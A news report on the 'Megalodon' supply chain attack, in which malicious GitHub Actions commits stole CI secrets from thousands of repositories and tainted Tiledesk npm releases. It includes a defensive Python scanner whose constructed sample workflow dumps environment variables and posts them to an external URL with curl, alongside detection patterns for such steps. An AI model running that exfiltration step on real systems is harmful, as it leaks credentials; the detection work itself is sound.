Megalodon Supply Chain Attack Compromises Over 5,500 GitHub Repositories in Just Six Hours

A significant software supply chain attack, referred to as “Megalodon,” has compromised over 5,500 repositories on GitHub, raising alarms about the increasing exploitation of automated development pipelines and GitHub Actions workflows. This incident, uncovered by SafeDep, involved a rapid deployment of malicious commits that injected credential-stealing payloads into numerous repositories.

Attack Overview and Methodology

The Megalodon campaign targeted repositories through automated commits that introduced malicious GitHub Actions workflows. These workflows were designed to harvest sensitive credentials, cloud access keys, API tokens, and other secrets stored within continuous integration and continuous delivery (CI/CD) environments.

On May 18, 2026, attackers executed a coordinated assault, pushing more than 5,700 malicious commits across thousands of repositories within a mere six-hour window. SafeDep’s investigation revealed that a total of 5,718 commits were deployed between approximately 11:36 UTC and 17:48 UTC, impacting 5,561 distinct GitHub repositories.

Researchers indicated that the Megalodon operation heavily relied on GitHub Actions to maintain persistence and covertly collect sensitive information from compromised development environments. The attackers utilized two distinct payloads: one introduced a new GitHub Actions workflow set to run on every push and pull request, while the second replaced existing workflows linked to specific triggers, effectively creating dormant backdoors that could be activated remotely.

Scale and Coordination of the Attack

The malicious commits associated with this attack were reportedly authored by a user identified as “build-bot.” During the investigation, researchers uncovered 2,878 commits made on the same day linked to the email address used by that identity, along with another 2,841 commits tied to a second email address associated with the operation. All 5,718 commits tied to the Megalodon campaign were executed within the same six-hour timeframe, underscoring the highly coordinated and automated nature of the attack.

The scale and speed of this operation highlight the growing trend of threat actors weaponizing GitHub Actions and software development workflows to distribute malicious code at an unprecedented scale.

Targeted Data and Exfiltration Techniques

On the compromised systems, the malware aimed to exfiltrate a wide range of sensitive data. According to researchers, the stolen information encompassed CI environment variables, AWS credentials, Google Cloud Platform access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configuration files, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, API keys, and numerous other secrets typically stored in development pipelines.

A significant concern raised by researchers was the attackers’ use of the “workflow_dispatch” feature within GitHub Actions. This malicious workflow leveraged the trigger mechanism to establish dormant backdoors that could later be activated through the GitHub API using stolen GitHub tokens.

Researchers noted that the “workflow_dispatch” mechanism is exempt from GitHub’s anti-recursion protections, which usually prevent workflows from spawning additional runs through GitHub token-triggered events. This loophole potentially allowed attackers to reactivate compromised workflows even after the initial breach.
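As an added illustration for defenders (not SafeDep's tooling, and not code from the Megalodon payload), the Python below triages workflow files for the two shapes the article describes: a workflow that runs on every push or pull request, and one reachable through workflow_dispatch, combined with steps that read the whole secrets or environment context and post it to an external URL. The heuristics and both sample workflows are constructed assumptions, not indicators from the campaign.

```python
import re

# Constructed heuristics (assumptions for this example, not campaign IoCs).
TRIGGER_RE = re.compile(r"\b(push|pull_request_target|pull_request|workflow_dispatch)\b")
SECRET_DUMP_RE = re.compile(r"toJSON\(\s*secrets\s*\)|\bprintenv\b", re.I)
EXFIL_RE = re.compile(r"\b(?:curl|wget)\b[^\n]*https?://", re.I)


def workflow_triggers(text):
    """Return the trigger names declared under the top-level ``on:`` key.

    The block is taken as every line from ``on:`` up to the next unindented
    key, which covers both ``on: [push]`` and the multi-line mapping form.
    """
    block, inside = [], False
    for line in text.splitlines():
        if re.match(r"^on:", line):
            inside = True
        elif inside and line.strip() and not line[0].isspace():
            break
        if inside:
            block.append(line)
    return set(TRIGGER_RE.findall("\n".join(block)))


def triage_workflow(text):
    """Return (suspicious, reasons) for one workflow file.

    Trigger shape alone is normal for CI, so a file is only flagged when a
    step also reads the secrets/env context or ships data off the runner.
    """
    triggers = workflow_triggers(text)
    reasons = []
    if "workflow_dispatch" in triggers:
        reasons.append("remotely triggerable via workflow_dispatch")
    if {"push", "pull_request", "pull_request_target"} & triggers:
        reasons.append("runs on every push/pull_request")
    dumps = bool(SECRET_DUMP_RE.search(text))
    exfil = bool(EXFIL_RE.search(text))
    if dumps:
        reasons.append("step reads the full secrets/env context")
    if exfil:
        reasons.append("step sends data to an external URL")
    return (dumps or exfil), reasons


def scan_workflows(files):
    """files: {path: text}. Returns [(path, reasons)] for flagged workflows."""
    flagged = []
    for path, text in sorted(files.items()):
        suspicious, reasons = triage_workflow(text)
        if suspicious:
            flagged.append((path, reasons))
    return flagged


# Constructed samples: an ordinary CI file and an obviously bad one.
BENIGN = "name: CI\non: [push, pull_request]\njobs:\n  test:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n      - run: npm ci && npm test\n"
SUSPICIOUS = "name: build\non:\n  workflow_dispatch:\n  push:\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - run: |\n          printenv > /tmp/e.txt\n          curl -s -X POST --data @/tmp/e.txt https://example.invalid/collect\n"
```

Run it over the contents of every file under `.github/workflows/` in a repository (for example in a pre-merge check) and review anything `scan_workflows` returns.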

Links to Compromised Open-Source Packages

The researchers identified the Megalodon campaign after discovering malicious versions of the Tiledesk package, an open-source live chat and chatbot platform. The infected packages were reportedly published between May 19 and May 21, shortly after the malicious commits were introduced into the source repositories.

SafeDep’s analysis indicated that the same NPM account, “eljohnny,” using the email address [email protected], had published both the legitimate version 2.18.5 and the compromised versions of the package. It was emphasized that the attacker did not directly compromise the NPM account itself.

The attacker never accessed the NPM account; instead, they compromised the GitHub repository, leading the maintainer to publish from the poisoned source without realizing it.

Implications for Cybersecurity Practices

The Megalodon incident emerged shortly after NPM announced new security measures aimed at limiting similar supply chain attacks. Recently, NPM invalidated all granular access tokens with write permissions that bypassed two-factor authentication protections. This move was intended to mitigate the risk of attacks resembling earlier campaigns.

However, cybersecurity researchers cautioned that token protection alone may not adequately address the broader issue of repository compromise and the propagation of malicious code. Ox Security stated that while stricter token controls might reduce account hijacking risks, they do not resolve the fundamental problem of compromised repositories distributing malicious code within trusted development ecosystems.

If platforms continue to allow any type of code to be uploaded without rigorous vetting, the frequency of attacks is likely to increase. The company also warned that the Megalodon campaign could signify the onset of a larger wave of attacks targeting developers and open-source ecosystems globally.

“We’ve entered a new supply chain attack era, and TeamPCP compromising GitHub was only the beginning. What’s coming next is an endless wave, a tsunami of cyber attacks on developers worldwide,” Ox Security stated.

For further details on this incident, visit the original reporting source: thecyberexpress.com.
